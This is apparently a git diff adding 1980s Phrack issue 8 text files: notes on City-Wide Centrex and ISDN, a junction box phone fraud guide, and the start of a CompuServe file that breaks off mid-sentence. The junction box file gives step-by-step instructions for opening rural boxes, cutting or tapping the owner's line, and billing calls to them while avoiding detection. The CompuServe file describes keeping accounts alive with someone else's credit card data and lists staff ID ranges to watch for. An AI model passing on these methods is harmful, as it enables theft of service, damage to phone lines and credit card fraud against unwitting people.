+
+  ^                                           ^
+/ + \                                       / + \
+%PLP%>>>>>>>>>>>>>>>>>>PLP<<<<<<<<<<<<<<<<<<%PLP%
+%---%                                       %---%
+% P %            The Executioner            % P %
+% h %                                       % h %
+% a %                and the                % a %
+% n %                                       % n %
+% t %           PhoneLine Phantoms!         % t %
+% o %           -    -    -                 % o %
+% m %                                       % m %
+% s %    Present: The City Wide Centrex     % s %
+%---%                                       %---%
+[PLP]>>>>>>>>>>>>>>>>>>PLP<<<<<<<<<<<<<<<<<<[PLP]
+
+     The CWC (City-Wide Centrex) feature provides multiple location large
+business customers with centrex features, attendant features, and dialing
+capabilities that are transparent across geographic locations and are
+independent of the configuration of the #1AESS switches providing the service.
+Historically, centrex customers have been somewhat limited to the bounds of the
+servicing switch. Customers could be built across switches, but with
+limitations. Multiple locations could be arranged to share some features in
+common only when placed in a centrex complex served by a single switch.
+Obviously, for this to be feasible, the locations had to be geographically near
+each other. The CWC feature expands the concept of the centrex group by
+allowing a multi-located business to function as a single centrex arrangement
+called a CWC group. Although each customer location remains a part of its own
+switch with its own individual capabilities, it now functions as part of the
+CWC group. Selected centrex features that were defined to operate within the
+bounds of a serving switch centrex group are now redefined to operate within
+the bounds of the CWC group. The outer boundary of the CWC cannot exceed the
+boundary of the LATA due to LCCIS constraints.
+
+     The CWC feature provides a comprehensive communications package for a
+multiple location centrex customer. Some advantages are:
+
+          o Extension to Extension (Intercom) dialing.
+
+          o Concentration of private facilities access at one location.
+
+          o Elimination of dedicated facilities between locations within the
+            CWC group.
+
+          o Transparency of feature operation across switches.
+
+Use of CCIS trunks to replace tie trunks results in the need for fewer total
+trunks and trunk groups. Remote access reduces the total number of customer
+trunks required and centralizes customer facilities at one location. All
+switches need LCCIS so that information can be passed between locations.
+
+==================
+=Intercom Dialing=
+==================
+
+     Intercom dialing gives the customer the ability to dial extension numbers
+(intercom) to other locations. This is done either by dialing the interlocation
+intercom number or by a speed call code which contains an interlocation
+intercom number. The customer has the option of routing these interlocation
+intercom calls via simulated private or public facilities. After determining
+the intercom number dialed is in location, the originating office routes the
+call to that location. The call is identified in the centrex customer's digit
+interpreter tables as an interlocation intercom call and normal interoffice
+call processing determines routing. A decision is made as to whether simulated
+facilities are used for routing the call based on the location identification
+of the called line. If needed, a simulated facility is seized. This is
+determined by a distant line status request on the called line at the end of
+dialing. The originating offices sends information to the terminating office
+identifying the call as interlocation intercom call. The CWC group and
+location identifier of the calling party are also sent. This is done by using
+the RCLDN (retrieval of calling line directory number) to transmit this
+information. The terminating office recognizes as incoming call as such. If the
+two-way simulated private facilities are used, the count on facilities at the
+terminating office is incremented. The use of 2 way simulated pricate
+facilities for a call is based on the location identifier of the calling line
+and whether simulated private facilities were used on the outgoing side.
+
+===========================
+=Centrex Attendant Console=
+===========================
+
+     The tie trunks are replaced by CCIS trunks, therefore some changes are
+required in the use of the attendant console. The changes are as follows:
+
+     o Busy Verification and attendant call through tests are not applicable
+       since there will no longer be specific trunks dedicated to the customer.
+
+     o The existing trunk group busy lamps are replaced with busy lamps for the
+       simulated facilities between locations.
+
+     The digit interpreter table entry at each remote location contains the
+"Dial 0" DN for the attendant. This is done to process interlocation intercom
+calls which terminate to the attendant. If the attendant console uses a centrex
+data link, the line equipment assigned to the DN should specify the call
+indicator lamp to be used. A different DN should be used for each location if
+separate call indicator lamps are desired for calls from each location. This
+call indicator lamp flashes at the intragroup rate of 120ipm (interruptions per
+minute) to indicate interlocation intercom calls.
+     The RCLDN primitive is used to transmit information for intercom dialing
+between locations. In addition, the RDLS priminitive is used to provide CWC
+information to obtain the CWC group and location identifier of the called line.
+The originating, incoming, and CCIS incoming registers are used to save
+information at both he originating and terminating offices. These registers
+include the CWC group, CWC location identifier, a CWC call type, and an
+indicator whether simulated facilities were used at the originating.
+
+==========================
+=Remote Access to Private=
+=       Facilities       =
+==========================
+
+     Remote access to private facilities allows the CWC customer to access
+physical private trunks and simulated facilities at a single location. This
+allows customers to consolidate their private facilities at one location. The
+number of trunks required is reduced. Any station can access these facilities
+by dialing the same access code as the main location. If a station dials the
+access code for a private facility, the call is routed to the main location
+using the same facility as an interlocation intercom call. It is then routed
+out from the main location. The CWC feature does not allow the customer to use
+the ACOF (Attendant Control of facilities) feature from a remote location. The
+types of private facilities which are accessible are:
+
+     o Tie Trunks
+     o FX (Foreign Exchange)
+     o CCSA (Commmon Control switching arrangement)
+     o ETS (Electronic Tandem Switching)
+     o WATS (Wide Area Telecommunications system)
+     o FRS (Flexible Route selection)
+     o EEDP (expanded electronic tandem switching dialing plan)
+
+     The CCIS direct signalling messages are used to communicate between the
+remote and main locations during the digit collection and analysis of out-going
+calls. Once the voice path has been established, a CCIS banded signalling
+message transmits the digits collected. A remote access register is used to
+store information retrieved during the processing of the signal requests. This
+register belongs to the OR (Originating Register) pool at the main location.
+     The remote location is responsible for digit collection and transmission
+of collected digits. A remote access data CCIS direct signalling message
+transmits the digits from the remote to the main location, which returns
+instructions for the next action to be performed. The following items are sent
+from the remote to the main location:
+
+     o The digits collected.
+     o The FRL(facility restriction level) of orig. line.
+     o A FRL present indicator
+     o A customer changeable speed call indicator.
+     o A call forwarding over private facilities indic.
+     o An add-on indicator.
+     o The CC location identifier of remote location.
+     o The remote access register # of the main location.
+     o An abandon remote access request indicator.
+
+     The main location analyzes the information transmitted and returns the
+next set of instructions to the remote location. The full analysis of a call
+may require several direct signalling messages with information saved from the
+previous direct signalling messages. This is required to process the current
+direct signalling message being saved in the remote register. The information
+gathered is used to establish the voice path for the call. Upon receipt of a
+direct signalling request, processing is done in accordance with the function
+indicated in the remote register. The types are as follows:
+
+     o Translate access code
+     o Translate prefix digit
+     o "1+" dialing check
+     o Check for possible account code
+     o Complete account code received
+     o 3 digit translation
+     o 6 digit translation
+     o 10 digit translation
+     o Analyze authorization code
+     o FRS 3 Digit translation
+     o CCSA translation
+     o Abandon call
+
+     After processing at the main location is complete, the remote access
+register is set up to identify the next type of function. Then, the main
+location returns a CCIS remote message to the remote location. The information
+returned from the main location is always in the same format and is saved on
+the OR.
+
+==========
+=Features=
+==========
+
+     The CWC group is allowed many features, here is a list of them.
+
+
+1. Call Forwarding Variable: Users can forward their calls to remote stations
+   located in another office by dialing the access code and the intercom
+   number of the CWC station.
+
+2. Call Forwarding Busy Line: Provides for the forwarding of calls to any
+   interlocation station within the CWC group upon encountering a busy station.
+
+3. Call Forwarding Don't Answer: Provides for the forwarding of calls that are
+   not answered within a predetermined number of ringing cycles.
+
+4. Call Transfer: Allows the station user to transfer any established call to
+   any other station within the CWC group with the following constraints.
+
+     o Dropback rules do not permit 2 outgoing trunks to be involved in the
+       final 2 party connection. However, 2 outgoing trunks can be involved in
+       a 3 way conversation.
+
+     o On interoffice calls involving a fully restricted station, flash
+       capability is allowed. However, the controller is not permitted to
+       connect the fully-restricted station to any other station, either in
+       dropback or a 3 way conversation.
+
+     Cross network call transfer transparency requires that each location be
+provided the Call Transfer-Individual or Call Transfer-Individual-All calls
+feature. The CTO (call transfer outside) option may be provided.
+
+5. Call Waiting feature provides a burst of tone when the called party is busy
+on another call. The types of Call Waiting features and CWC interactions are:
+
+     o Call Waiting Originating: allows a CWC calling station to direct a call
+       waiting tone toward a busy station within the same CWC group.
+
+     o Call Waiting Intragroup: gives call waiting tone to a called party
+       which has call waiting terminating on all intragroup calls.
+
+     o Dial Call Waiting: Allows originating CWC station users to invoke call
+       waiting on CWC intragroup calls by dialing an access code followed by
+       the extension number of the station to be call waited.
+
+6. Distinctive Ringing/CW Tone: Allows a CWC station user to determine the
+source of a call incoming to the station. This is done by associating a
+distinctive ringing or tone pattern with the incoming call based on its source.
+Interlocation CWC calls receive intragroup treatment.
+
+7. Message Desk Service: Provides centralized and personalized call coverage or
+message answering capabilities which can serve the needs of all CWC locations.
+The Call Forwarding Variable and Call Forwarding Busy Line/Don't Answer feature
+are needed of forwarding calls from stations within the CWC group.
+
+8. LASS (Local Area Signalling Service): Provides the called party with call
+management and security services. Local CCIS is required for multiple-office
+grouping within a LATA for intercom calls. The following features comprise the
+LASS offering :
+
+     o Automatic Recall: Enables a station user to place a call to the LCDN
+       (Last Call Directory Number) currently associated with the users fone.
+       The LCDN can either be the last party called by the station user or the
+       last party to call the station user.
+
+     o Distinctive Alerting: Allows the station user to prespecify a set of
+       numbers which activate a distinctive ring or distinctive call waiting
+       tone. The CWC extension numbers can be entered on the screen list. When
+       the user receives a call from one of these numbers, the phone if idle,
+       will ring with a special distinctive ringing pattern. If a call waiting
+       customer's line is busy, a special tone notifies the customer of the
+       impending call.
+
+     o ICLID: provides the number which is calling the station user. (Explained
+       in other files)
+
+     o Selective Call Forwarding: (Explained in other file)
+
+     o Selective Call Rejection: Provides the user with the capability of not
+       being alerted by calls from a specified set of numbers. The user inputs
+       the numbers to be rejected from the station set. These numbers are
+       specified either directly (dialed in) or as the number of the last call
+       received. The CWC extensions are allowed on the screen list.
+
+===========================================================
+=(C) 1986 The Executioner and The Egyptian Lover and PLP  =
+===========================================================
+This file is based on the AT&T document for the CWC.
diff --git a/phrack8/4.txt b/phrack8/4.txt
new file mode 100644
index 0000000..b02584f
--- /dev/null
+++ b/phrack8/4.txt
@@ -0,0 +1,418 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Eight, Phile #4 of 9
+
+                    The Integrated Services Digital Network
+
+                           ---==> By Dr. Doom <==---
+
+  ISDN or Integrated Services Digital Network has been talked about off and on
+by AT&T and until now has just been a demented AT&T fantasy, but it is to soon
+become a reality.  This phile is the second I have written on the subject and
+is a cumulation of information from three basic sources :
+
+<1> The ISDN AT&T Technical Journal
+<2> An interview with an AT&T Long Distance Operations Center Supervisor who
+    will be referred to as Mr. R.
+<3> and some general ISDN articles from Southwestern Bell Newsletters.
+
+
+ISDN Definition
+===============
+
+CCITT Definition : An end to end digital network that supports a wide range of
+services accessed by a set of standard multipurpose user-network interfaces.
+
+  ISDN will allow for incredible new services that will drastically change the
+telecommunications industry and everyone's lives.  For example, one new service
+ISDN will bring about is calling party identification.  This will allow
+businesses and individuals who subscribe to that service to know exactly what
+number you are calling from before they even decide whether or not to answer
+the phone.
+
+In the case of dialups like MCI, the originating # will be stored in a computer
+along with whatever code and number that person dialed which would greatly
+hinder abuse of codes from a home phone.
+
+  This is just the tip of the iceberg as far as ISDN is concerned.  This phile
+will analyze and describe how The Integrated Services Digital Network will
+operate when it is implemented.
+
+
+Out of Band Signalling
+======================
+
+  Essential to a network capable of providing such enhanced services as calling
+party identification is out-of-band signalling.  Until the late 70's, when AT&T
+introduced the 4ESS toll switch and CCIS into the national network, switches
+had communicated with each other over the same channels in which our voice or
+data was transmitted (in-band).  During this time, all signalling between
+switches had to be limited to a type that could be accommodated in the 'voice'
+channel thus making it impossible to offer any advanced services.
+
+  The development of the separate Common Channel Interoffice Signaling (CCIS)
+network allowed for more freedom and flexibility and thus came about the AT&T
+Calling Card service.
+
+  ISDN brings an interface from the network to the subscriber's equipment. This
+is a completely digital interface subdivided into two types of channels :
+
+The 'D' Channels are those used for sending signalling and control information
+across the interface. The 'B' Channels are those used only for customer
+information which can be in the form of voice, data, or video.
+
+The 'D' Channel hence manages the information or 'B' Channels making the
+signalling 'out-of-band' and not 'in-band' as it is now.  This approach allows
+for two distinct benefits :
+
+<1> All the capacity in the information bearing channels is available for
+    customer use.
+<2> The 'D' Signaling channel allows for distributed processing across the ISDN
+    Network.
+
+ISDN Interfaces
+---------------
+
+  The CCITT has defined two major interfaces that will be used in conjunction
+with the 'D' and 'B' channels :
+
+The Basic Rate Interface (BRI) consists of one D Channel and two B Channels.
+This interface is used for locations where information transport is relatively
+small like a residence.
+
+The Primary Rate Interface (PRI) consists of one 'D' Channel and 23 'B'
+Channels.  It is used for large capacity vehicles such as PBX's.
+
+Notice that there are 2 DIFFERENT 'B' Channels in the Basic Rate Interface.
+This allows TWO different types of data to be sent over the same connection at
+the same time.  For example, you could be ULing files to a board on Channel 1
+while talking to the SYSOP on Channel 2.
+
+So, if both you and a board both have a BRI ISDN Interface, next time the SYSOP
+says 'Go Voice', you simply pick up the handset, switch it to channel 2, and
+start talking...
+
+These multiple channels are also the foundation for the widespread use of Video
+Phones.  Just like you were sending data over channel 1, and talking voice on
+channel 2, you can be sending video over channel 1 (allowing the party's to see
+each other) and talking on channel 2.
+
+ISDN Devices
+============
+
+  AT&T Technologies, Advanced Micro Devices, and Intel are all in the process
+of designing equipment that will be compatible with ISDN.  So far, the two main
+designs talked about through SWB and AT&T are :
+
+<1> The Voice/Data Terminal This will look like any regular computer terminal
+   with the exception that it has a handset on the side of the terminal and a
+   couple of switches that will allow you to decide which channel is for DATA
+   and which channel is for VOICE. This will also (of course), allow two
+   customers with a V/D Terminal to be exchanging DATA over one channel while
+   talking voice over the other one.
+
+<2> The Video Phone
+   This is where (yes) Big Brother is arriving...  The Video Phone will work
+   pretty much just like it does in Science Fiction movies like 'Aliens' or
+   whatever. If two ISDN customers have video phones, they can talk and see
+   each other or whatever they want to show each other (HAHA) at the same time.
+   Video Phones obviously open up new frontiers for those with entrepreneurial
+   instincts.  You can bet there will be some interesting Video Phone Sex lines
+   around... Then, you can have things like 'Dial a Movie...Please enter (1) to
+   view Rambo'..etc... The list goes on.  This also leads to a whole new world
+   of problems for the telephone company like 'Obscene Video Calls'.  This is
+   again where Calling ID becomes important.
+
+Each of these units, and others that will work with ISDN will have some sort of
+a special viewing screen that will contain the necessary information about
+incoming calls which includes the originating number and can include such
+things as :
+
+<1> The name of the owner of that #
+<2> The city and state
+<3> The whole address for that #
+
+
+AT&T ISDN Building Blocks
+=========================
+
+  AT&T has designated certain 'building blocks' that will eventually be laid in
+place across the entire country to form ISDN.
+
+
+<1> AT&T Communications Service Node
+------------------------------------
+  The service node is the customer's gateway to the AT&T Communications nodal
+family of services, including MEGACOM, MEGACOM 800, and Acunet. The first
+service node went into service in 1985 in Philadelphia, PA.
+
+<2> Integrated Access
+---------------------
+  This allows customers to integrate switched and private line services over a
+single DS-1 link to the Service Node.
+
+<3> Out-of-Band Signaling
+-------------------------
+  Discussed earlier.
+
+<4> CCS7
+--------
+  The CCS7 Common Channel Signaling Network will soon replace CCIS as an
+out-of-band signalling between AT&T Network Communications Facilities. Because
+of its longer message format and layered structure, the CCS7 will support the
+new features.
+
+<5> Digital Backbone Network
+----------------------------
+  This nationwide AT&T Network includes extensive lightwave and digital radio
+routes.  By the end of 1988, these Digital Lightwave routes will extend to
+Europe with the TAT-8 lightwave system, and across the Pacific with
+HAW-4/TPC-3.
+
+<6> Intelligent Software Controlled
+    AT&T Communications Network
+-----------------------------------
+  This brings about more advanced software related services listed in #1.
+
+
+AT&T ISDN Operations
+====================
+
+
+Access Transport
+----------------
+  Your DS-1 signal is transported from your ISDN equipment to an AT&T
+Communications Service Node somewhere.
+  Your line gets to AT&T by tariff from the local exchange carrier (i.e...
+Southwestern Bell, GTE, or whomever happens to own your local switch...) or
+AT&T.  The direct link to the AT&T Service Node bypasses your local switching.
+
+AT&T Service Node
+-----------------
+  Your local AT&T Service Node is a service office that acts as a gateway to
+all the new AT&T Nodal ISDN services.  This service node is typically composed
+of :
+
+<1> A Refinished 4ESS Switch
+<2> CNI Ring (Common Net.-Interface)
+<3> Digital Access and Cross Connect System (DACS)
+
+Here is a diagram of how a customer location either goes to a local switch or
+AT&T's node :
+
+Key
+---
+CL = Customer Location
+=  = DS-1 Line
+!  = DS-1 Line
+>  = Exiting out to AT&T Network
+
+                                   --------
+                                   -      -
+                        ****       - Bell -
+                        *CL*=======- 5ESS -
+                        ****       -      -
+                                   --------
+                                         !
+                                         !
+                                         !
+                                         !
+                        ****             !
+                        *CL*     --------!--------
+                        ****===========4ESS=====>
+                                 -     4ESS=
+                        ****     -     ! ! !
+                        *CL*======DACS=! ! CNI==>
+                        ****     -DACS   ! CNI
+                                 -DACS=  !
+                                 -    ! 1PSS====>
+                                 -    !=1PSS
+                                 -
+                                 -----------------
+                                   AT&T Service
+                                       Node
+
+
+  The above diagram shows first how an AT&T Customer with ISDN can either
+continue service with his local telephone co. or go with a direct link to the
+AT&T Service Mode.  All lines going to an AT&T Service Node whether through
+Bell or a direct link terminate on either the 4ESS or the DACS.
+  When a line terminates on a DACS it serves as an Integrated Access
+Distributor and sends the call to the 1PSS (Packet Switch) for Acunet Packet
+Service or to the 4ESS and then eventually out to the AT&T Network.
+
+The AT&T Internodal Network
+---------------------------
+  In the internodal network facility, AT&T is in the process of deploying both
+digital lightwave and digital radio systems.
+
+Lightguide Systems :
+
+  In areas where growth is low, the FT3C and FTX180 Single mode terrestrial
+lightguide systems will be used between nodes.
+
+  On high growth routes AT&T will install fiber pairs at line rates of 1.7Gb/s
+with 20 mile repeater spacings.
+
+Digital Radio :
+
+  In the digital radio area, 4Gb/s systems such as the TD-90 and the TD-180
+provide a vehicle for rapid expansion of digital connectivity.
+
+
+ISDN and Digital Switches
+=========================
+
+  AT&T has redesigned the 5E Switching Modules in such a way that they are
+fully compatible with ISDN, but many of the existing 5E's and other switches
+were manufactured without ISDN capability.  To meet this need, AT&T has
+produced ISDN interfaces that modularly connect to the system. Here is a
+diagram of a 5ESS Switching Module with interfaces :
+
+Key
+---
+$ = ISDN V/D Terminal or Video Phone
+% = Standard Telephone
+= = Digital Line
+< = In-Band Line
+ISLU = Integrated Services Line Unit
+PSIU = Packet Switch Interface Unit
+
+
+                          --------------------------
+                          -          5ESS          -
+                          -       Switching        -
+                          -         Module         -
+                          -                        -
+                          ------------=----=--------
+                          -           =    =       -
+                     $====-----========    =       -
+                          -    -           =       -
+                     $====-    -   --------=---    -
+                          -ISLU-   -          -    -
+                     %<<<<-    =====   PSIU   -    -
+                          -    -   -          -    -
+                     $====--------------------------
+
+
+The two new hardware additions are :
+
+<1> Integrated Services Line Unit and
+
+<2> The Packet Switch Interface Unit
+
+  These units allow a LOCAL 5ESS (or other digital) Switch to serve both ISDN
+and non-ISDN customers. These interfaces are integrated into a switching module
+in a way that will allow ISDN customers to maintain all their previous Bell
+services like Local Calling.  Notice also that all lines, whether ISDN or not,
+terminate on the ISLU.
+
+Calling Party Identification
+============================
+
+  Discussed briefly in the preface of this phile, the ISDN enhanced Calling
+Party Identification service offered by AT&T ISDN will be into service along
+with the ISDN.
+  This quote out of the AT&T ISDN Technical reference should give you a good
+idea of the impact ISDN will have on hacking and phreaking :
+
+  'One example of an enhanced service which has already been included in the
+   ISDN signaling protocol and will have a fundamental impact on day to day
+   telecommunications is the provisions of calling party identification.
+   Calling party ID will help us decide whether or not to answer incoming calls
+   and will minimize instances of nuisance calls and COMPUTER FRAUD via
+   telephone.'
+
+  Mr. R, our AT&T Supervisor has been attending ISDN Conferences that include
+representatives from all the major LD Companies (AT&T, MCI, GTE, LDS, etc..),
+the Regional Bells, and other concerned parties.  He said quote 'One of the
+controlling factors behind The Integrated Services Digital Network is the
+simple fact that AT&T, MCI, and other long distance companies are losing
+MILLIONS to Phone Phraud.'  Once ISDN is realized, so will network wide Calling
+Party Identification.
+  Again, our friend Mr. R will enlighten us on the subject of ISDN Calling
+Party ID and a simple explanation of how it will work :
+
+  'Right now, when you pick up the phone in your home, Port Isabel South
+   Western Bell knows that you did.  Then, when you dial a number, they know
+   what number you dialed. So they send that information along to us (the AT&T
+   Toll Switch).  We then send that along through the network to the person you
+   are calling.'
+
+Of course, there is one transaction between AT&T and a Bell Office at the end
+that he left off, but if the person or computer you are calling has ISDN
+Calling Party ID service, your originating # will be sent along the DS-1 Line
+Interface from Bell to his equipment and show up on his screen after traveling
+through the network like Mr. R described.
+
+This is rather simple when you think about it and is one example of how a once
+shattered network is working together.
+
+Some Sample CP ID Uses
+----------------------
+This can be used by large telephone ordering companies to instantly display a
+record of that persons credit, previous orders, etc... before the call is even
+answered on the attendant's terminal.
+
+When someone logs onto a computer, the originating # is listed on the user log
+along with the account name, etc... so that if there is an unauthorized login,
+they can contact the authorities to do whatever or monitor that number until
+they get enough evidence to prosecute.  The same thing holds true with LD
+Dialups.  They will record the originating number along with the code and bill
+making MCI use rather dangerous.
+
+
+SWB ISDN News
+=============
+
+  The following article was extracted from The Southwestern Bell Texas
+Publication of Telephone Times and is entitled 'User Forum simplifies ISDN' :
+
+" Houston---Houston Marketing employees played show and tell with two customers
+and all three groups are better off for it.
+  Marketing Representatives, with support from Bell Comm. Research, Illinois
+Bell, AT&T, and McDonald's Corp. met with Shell and Tenneco to discuss ISDN.
+  'ISDN is an evolving technology' said Bob Campbell, division manager
+marketing business sales.  'It's still in the developmental stage.  These User
+Forums will give customers input on how it's deployed and what it will look
+like.'
+  ISDN is an all digital network that transmits voice and data messages
+simultaneously over a single telephone line.
+  'The User Forums allow customers to share information on specific problems
+concerning implementation, training, customer premise equipment and
+applications,' Campbell said.
+  Linda Hobson, manager marketing administrative and coordinator of the event,
+said not only will User Forums be standard practice in Houston, but probably
+will become the national standard.
+  'We're doing it quarterly here, but as more people become interested, we may
+meet more often,' Hobson said.
+  Shell and Tenneco, who have signed letters of intent to purchase ISDN, were
+specifically interested in such topics as trial status (SWBT's ISDN trials will
+begin soon in St. Louis and Texas), available features, power requirements, and
+future enhancements.
+  'In the past, we bought the available enhancements, then sold them to the
+customer,' said Hobson.  'That's changing.  We have to find out what the
+customer wants, then deliver the service that meets the specific needs'"
+
+  That concludes the nice little article which by the way, contained some
+interesting little tidbits of information.
+
+
+Conclusion
+==========
+
+  ISDN is a VERY complicated plan that will drastically change the
+telecommunications scene in this country and abroad.  Although AT&T has boasted
+in it's Technical Journals of being able to have its ISDN Capable Network
+completed by Early 1987, this date seems to keep getting postponed back
+according to our friend Mr. R (The AT&T Supervisor) and he is shooting for
+large scale ISDN no earlier that late 1988 or 1989.  Whenever ISDN does become
+reality, people will probably just put out files with lists of computers that
+subscribe to ISDN Calling Party Identification, and tell people not to call
+them from their home.
+
+  I hope you have enjoyed reading this phile on ISDN, I will be on the outlook
+for more information on it.
+
+If you don't already have the # and New User Passwords to Metromedia BBS, send
+me (Dr. Doom) mail on any of the boards I am on.
diff --git a/phrack8/5.txt b/phrack8/5.txt
new file mode 100644
index 0000000..aa3c8a7
--- /dev/null
+++ b/phrack8/5.txt
@@ -0,0 +1,98 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Eight, Phile #5 of 9
+
+**************************************************************************
+******************** The Art of Junction Box Modeming ********************
+               ******** Written Exclusively For: ********
+                     ******** PHRACK INC.! ********
+**************************************************************************
+*                       by Mad Hacker of 616                             *
+ *     Watch for Thieve's World ][ coming soon, now with 33 megs!       *
+  **********************************************************************
+
+        This file will detail the use of a rural junction box to fraud the
+phone company and make all the free phone calls you want to BBS or AE by.
+
+        There are two basic types of rural junction boxes: Residential and
+Group boxes.  I will first discuss Residential as they are easier to find
+and easier to use.  There are a couple of requirements before you can make
+full use of a Junction Box.  First you must have some kind of portable
+computer with a built-in modem or at least a hand phone if all you want to
+do is make free calls to your friends.  For computer I would recommend
+something like a Model 100 from Radio Shack.  Small, inexpensive but only
+300 baud and only 32K of total storage.
+
+        Anyway you can find residential junction boxes in most any rural area
+just a few feet off the road and usually covered over with local weeds.  Fish
+your way thru the weeds and open it up.  Some just open with a twist or a
+turn, others are actually locked and require a little more patience.  Anyway
+once you have it open, you should see at least 4 pairs (possibly more) of
+wires.  You are only concerned with the pair containing both a red and a green
+wire.
+
+        Now you need to make a choice:  Do you want to totally cut off the
+regular owners of the phone line and do actual damage to this junction box or
+leave them connected but have the possibility of them picking up their phone
+and hearing your carrier?
+
+        Usually you will want to cut them out totally, so simply find a bit of
+slack in the line and cut both wires.  Now in most boxes the connection to the
+outside world comes from the bottom of the box, but sometimes you will find
+one that doesn't conform.  Simply attach a hand phone to the wires (matching
+up colors, of course) and see if you get a dial tone.  Anyway once you have
+the proper pair then hook up to your modem line and dial anyway.  Meanwhile
+the lawful owners of the line will get a dead line on their end, so try to
+do this only when you think no one would be using the phone, like 11PM to 7AM
+or else they will probably call their LOC and tell them to fix the line and
+when they see the cut wires, they will wonder what went on there.  Finally be
+a good guy and when you are done, resplice the wires together and shut the
+box.
+
+        Now usually you don't want to cause permanent damage to the box, so
+simply strip off the insulation on the line and attach the red and green ends
+of your modem cord to them.  Now when you cut in, it will be much like an
+extension was picked up.  Simply dial away and have fun.  Of course if anyone
+at the house picks up the line they will get your carrier and will wonder, so
+try to limit your activities also to the same hours mentioned above, unless you
+know who you are ripping off and when they use the phone.  The advantages of
+this method is that once you strip the wires, there is little work to do each
+time you use the box again.
+
+        Now what do you do if you are lucky enough to find a Group box?  Well
+first you are confronted with a multitude of wires, anywhere from 10 pairs up
+to 100 if you use a box on the edge of a small town.  Finding a pair of the
+right wires is a little more difficult unless your LOC has done repairs at
+this box in the last couple of months, in which case a lot of the wires will
+already be paired off.  If you aren't so lucky find a couple of wires and try
+them out.  Once again you have the choice of stripping or cutting the wires,
+but the advantage here is that you can use this box for about 4-6 months
+without having to find a new one.
+
+        What is the this junk about having to find a new box?  Well you see
+when you use a junction box in this manner, you are basically adding an
+illegal extension to a private line.  Any calls you make will show up on the
+rightful owners bill.  If you are only using the box for one or two short to
+medium length calls a week, then you might not have any problems.  However if
+you use a box too much and the people keep calling the billing office about
+the extra calls, the billing office will call those numbers and hear the
+carrier.  This will tip them off to the fact that someone is either lying at
+the rightful owner's house or that someone has tapped into their phone line.
+At this present time in the Midwest, it take about 2-3 months for the LOC to
+realize that someone is playing with their junction box.  What they do is come
+out and repair the wires and usually put a newer lockable box on the site to
+discourage illegal use.  I haven't yet really pushed the LOC to any limits
+yet, but one might suspect that has Junction boxing catches on to those of us
+who have access to laptop computers, the LOC may find some way of catching us
+at our little game.
+
+        If anyone has any new information on how your LOC is handling this use
+of their junction boxes please let us know by leaving mail for Thomas Covenant
+on any Metal Shop board.
+
+        [Postscriptum note by Thomas Covenant: I'd recommend one of those so-
+called "portable" AT-compatibles.  Great clock speed, 1200 baud, and a bigger
+screen.  And why not pack a picnic lunch and some booze?  You'll be there all
+day once you get started!]
+
+^Z, or "EOF"
diff --git a/phrack8/6.txt b/phrack8/6.txt
new file mode 100644
index 0000000..d10eda2
--- /dev/null
+++ b/phrack8/6.txt
@@ -0,0 +1,129 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Eight, Phile #6 of 9
+
+                                COMPUSERVE INFO
+                                ---------------
+                                 Compiled and
+                                  Related by:
+                               Morgoth and Lotus
+                               -----------------
+
+  Since its rather humble beginnings in Dublin, Ohio some years ago,
+Compuserve, or CIS, as it will be referred to in this article, has grown to
+become the largest entertainment/public user oriented system in the country.
+This file is divided into two parts.  The first is how to get your own CIS ID
+number, and make it last a relatively long time.  This part may seem like old
+hat to some of you out there.  The second part is information on what to do
+once you are on the system...tricks and tips to keep you out of trouble, or
+cause trouble.
+  A Compuserve identification number is divided into two parts; a project
+number and a programmer number.  An example would be 70007,1460.  This ID is
+what you will be known by at all times on the system.  When you log on, you
+will also be prompted for a password, in addition to your user ID.  The
+password is divided into two words, kept apart by a separator  (-,:,.,etc). The
+password may be any two words the user desires, including garbage, which makes
+gaining an ID by hacking the password almost, if not totally, impossible.
+  The most popular, and about the only way left, of gaining an ID is by buying
+what the system calls a snapak.  These are the little goodies you see in the
+store in the introductory packets.  With this, you can gain access to most, but
+not all of the system.
+  The first ID, or the "intro" ID will last about a week, at which time,
+Compuserve automatically changes the password, and sends the new one to you via
+the US Postal service.  This is a key point to the ID scam.  You MUST have
+valid Credit Card information to be able to continue using the ID.  I have
+heard of intro IDs going bad in a matter of 2 or 3 days due to having non-valid
+credit card info.  So you need to set up a location to which your second
+password can be mailed.  This second password should last about a month,
+depending on how much credit the CC holder has on his card.
+  When applying credit to a Visa or Mastercard, Compuserve will submit the
+charges about once a week.  If you run up about $500 in connect charges, and
+the credit card cannot hold it, the ID will go bad.  This is the most common
+way for an account to run out.
+  Your first password has some limits.  Due to hackers using snapaks,
+Compuserve has installed a system which prohibits IDs without the second
+password from entering any type of game online.  This ranges from the
+ever-popular MegaWars, to YGI, all the way down to Casino.  This is one reason
+why the second password is so important.
+  If more than one person will be using the account, which is usually the case,
+there are also some limits to be observed.  The same ID can no longer enter the
+CB simulator more than once.  If it is tried, the message "exceeding job limit"
+will occur, and you will be taken back to the prior menu.  The same ID can go
+into a SIG at the same time, but both people cannot enter COnference mode while
+on the SIG.  The best way to talk to another user who is on the same ID is to
+go into any forum, say CBMART, and have one of them enter COnference mode.
+There, the two users can use the /SEN command to relay messages between the SIG
+and COnference.  This is kind of complicated, but it is the only way.  Also,
+anytime the message "exceeding job limit" goes to your screen, the people at
+CIS put a small "red mark" by your name.  If it occurs too frequently, they
+look into the situation to find out if more than one person may be using the
+same ID.
+  Special IDs -- Ok, now that you are on Compuserve, what should you look out
+for? As mentioned before, the user ID is divided into [project
+number,programmer number] format.  The Programmer number is of no importance,
+but the Project number is.  Some of the ones you should be aware of while
+online are:
+
+  70000,xxxx  Compuserve Security
+  70003,xxxx  Compuserve Employee
+  70004,xxxx  Same as above
+  70005,xxxx  Radio Shack demo account
+  70006,xxxx  Customer service, or "Wizard" number (see below)
+  70007,xxxx  Complimentary account
+  76703,xxxx  SIG SysOp, or Forum Info Provider
+
+  While on CB, look out for the 70000 IDs, and especially the 70006, or
+"wizard" numbers.  The Wizard ids have some very special functions.  The main
+one is called autogag, or /GAG.  This allows the bearer of this ID to banish
+any user from the system, in a way.  What it actually does is to keep the
+/GAGged person out of everyone's view.  They will not show up on the /ust list,
+and anything they type will not show up on anybody else's screen.  Kind of like
+a mute button on a television.  The Chief of CIS security is Dan Pisker, and on
+CB he uses the handles "Dan'l", or "Ghost", with a 70000 id.
+  Monitoring -- This is a very popular subject with the users of Compuserve,
+but when broken down, it is quite simple.  CIS is capable of monitoring
